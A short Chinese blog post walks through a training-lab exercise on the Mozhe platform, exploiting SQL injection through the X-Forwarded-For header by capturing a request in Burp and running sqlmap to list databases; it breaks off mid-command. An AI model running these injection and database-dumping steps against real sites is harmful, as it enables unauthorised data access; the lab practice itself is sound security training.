墨者X-Forwarded-For注入漏洞实战
题目是X-Forwarded-For注入漏洞实战,我们先来brup抓包
brup抓包发现没有X-Forwarded-For头。就试试添加X-Forwarded-For:0.0.0.0试试,发现有回显
那我们就把把X-Forwarded-For的值设置为即X-Forwarded-For:,然后保存为1.txt
1.sqlmap -r 1.txt --dbs --batch爆库,注出information_schema库和webcalendar库
2.sqlmap -r 1.txt -D webcalen
原创
2020-07-18 14:52:51 ·
284 阅读 ·
0 评论